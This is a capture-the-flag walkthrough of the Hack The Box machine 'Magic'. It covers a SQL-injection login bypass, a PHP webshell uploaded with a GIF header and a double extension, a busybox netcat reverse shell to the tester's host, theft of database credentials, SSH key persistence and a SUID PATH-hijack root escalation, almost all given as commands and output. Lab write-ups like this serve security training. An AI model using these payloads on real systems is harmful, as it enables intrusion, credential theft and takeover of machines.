WriteupsHTB — Magic
WebMediumLinux
HTB — Magic
Magic Portfolio with SQLi bypass on login. File upload bypass with double extension for PHP webshell. mysqldump credential extraction and SUID sysinfo for root.
January 20, 2025HackTheBox
#SQLi#File Upload Bypass#SUID#MySQL
nmap
sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.10.185
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-20 00:22 EST
Nmap scan report for 10.10.10.185
Host is up (0.021s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
| 256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_ 256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=1/20%OT=22%CT=1%CU=35591%PV=Y%DS=2%DC=T%G=Y%TM=678D
OS:DDB9%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=10F%TI=Z%CI=Z%II=I%TS=A)
OS:SEQ(SP=FF%GCD=1%ISR=10F%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M53CST11NW7%O2=M53CST
OS:11NW7%O3=M53CNNT11NW7%O4=M53CST11NW7%O5=M53CST11NW7%O6=M53CST11)WIN(W1=F
OS:E88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M
OS:53CNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T
OS:4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+
OS:%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y
OS:%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%
OS:RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 20.86 ms 10.10.14.1
2 21.07 ms 10.10.10.185
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.24 seconds
80/tcp open http
sh
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
sql injection
upload
sh
echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif-
upload location
/images/uploads/guaca.jpg
-
add
.php.jpg
-
add the webshell like in the middle
rev shell
http://10.10.10.185/images/uploads/guaca.php.jpg?cmd=busybox+nc+10.10.14.6+1234+-e+/bin/bash
sh
nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.185] 54902
whoami
www-datash
python3 -c 'import pty; pty.spawn("/bin/bash")'creds
sh
www-data@magic:/var/www/Magic$ cat db.php5
cat db.php5
<?php
class Database
{
private static $dbName = 'Magic' ;
private static $dbHost = 'localhost' ;
private static $dbUsername = 'theseus';
private static $dbUserPassword = 'iamkingtheseus';
private static $cont = null;thesus:iamkingtheseus
sh
www-data@magic:/var/www/Magic$ netstat -tulnp
netstat -tulnp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 ::1:631 :::* LISTEN -
udp 0 0 0.0.0.0:5353 0.0.0.0:* -
udp 0 0 127.0.0.53:53 0.0.0.0:* -
udp 0 0 0.0.0.0:68 0.0.0.0:* -
udp 0 0 0.0.0.0:631 0.0.0.0:* -
udp 0 0 0.0.0.0:60075 0.0.0.0:* -
udp6 0 0 :::5353 :::* -
udp6 0 0 :::57859 :::* local port forwarding
sh
./chisel server --reverse --port 1234sh
www-data@magic:/tmp$ ./chisel client 10.10.14.6:1234 R:3306:127.0.0.1:3306sh
mysql -h 127.0.0.1 -u theseus -p''
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 56
Server version: 5.7.29-0ubuntu0.18.04.1 (Ubuntu)
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| Magic |
+--------------------+
2 rows in set (0.023 secsh
MySQL [(none)]> use Magicsh
MySQL [(none)]> use Magic
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [Magic]> show tables;
+-----------------+
| Tables_in_Magic |
+-----------------+
| login |
+-----------------+
1 row in set (0.030 sec)sh
MySQL [Magic]> select * from login;
+----+----------+----------------+
| id | username | password |
+----+----------+----------------+
| 1 | admin | Th3s3usW4sK1ng |
+----+----------+----------------+
1 row in set (0.027 sec)creds
admin:Th3s3usW4sK1ng
sh
nc -lnvp 1235
listening on [any] 1235 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.185] 54886
su theseus
python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@magic:/var/www/Magic/images/uploads$ su theseus
su theseus
Password: Th3s3usW4sK1ng
theseus@magic:/var/www/Magic/images/uploads$ whoami
whoami
theseususer.txt
sh
theseus@magic:~$ cat user.txt
cat user.txt
81d91ad7...sh
theseus@magic:~/.ssh$ echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCOVo6gKQHsVnlvebJJ6R6wydgZoQvn78Hho9MMpLiSMfNCrS1xCnuKxAPfBulLdkdFHjz/gZz1cZZZcdAEXrU6zfgegux04S0Rl5+ny1xBrm098qz1EL274hQYho2Ezqkct7r3KaqPk2Do+ZOS9AZFC7CbeP3DrsK5kibTIE9KhYrb1+++XWGdqRqPUCMp2XbuvPLkfORDUCxzJiGTcm979IGlYgAaTafyZUwkSD3++fIQ0JWbTicn2rCKM6IAcR0cqhO1AWKf22hDKbkRczjtOTYZmx/SE6NwKYY0buxpaXrp8mIb5zFmwF08U19jcCyLjTmsLjZpTUgqWUMbfUeW47a/LIRzFx20BbWs/fs+pNbQqh05e3/VrZyzPOhu0uKqMugJBafEoR9oZIOUzywp1hFaTdji7bkh9MlziY/0L86i1+kUNxaGFbdbdETGuks5ydZDnl+GajuuqCruQA4GPRPECw3qzgO2oWTsVdOZKMdRjVuLOOq5tYkszV4ofRk= root@kali
<ECw3qzgO2oWTsVdOZKMdRjVuLOOq5tYkszV4ofRk= root@kali
> ' > authorized_keysSUID /bin/sysinfo path hijack
- the SUID is not using the full path
lshw
sh
theseus@magic:~$ echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/lshw.csh
theseus@magic:~$ gcc /tmp/lshw.c -o /tmp/lshwsh
theseus@magic:/tmp$ export PATH=/tmp:$PATHsh
theseus@magic:/tmp$ /bin/sysinfo
/bin/sysinfo
====================Hardware Info====================- get a reverse shell with busybox
sh
root@magic:/home# busybox nc 10.10.14.6 1234 -e /bin/bashroot.txt
sh
cat root.txt
4ede47b5...
Up next
EasyJan 2025
HTB — Sauna
ASREPRoasting on user names enumerated from the bank website. DCSync attack via GenericAll rights for Domain Admin hash dump.
Read writeup
MediumJan 2025
HTB — Monteverde
Azure AD Connect with user enumeration via RPC. Password spraying finds default creds. Azure AD Sync password extraction for Domain Admin.
Read writeup
EasyJan 2025
HTB — Timelapse
SMB share contains ZIP with password-protected PFX certificate. Cracked PFX used for WinRM. LAPS password read via LDAP for Administrator.
Read writeup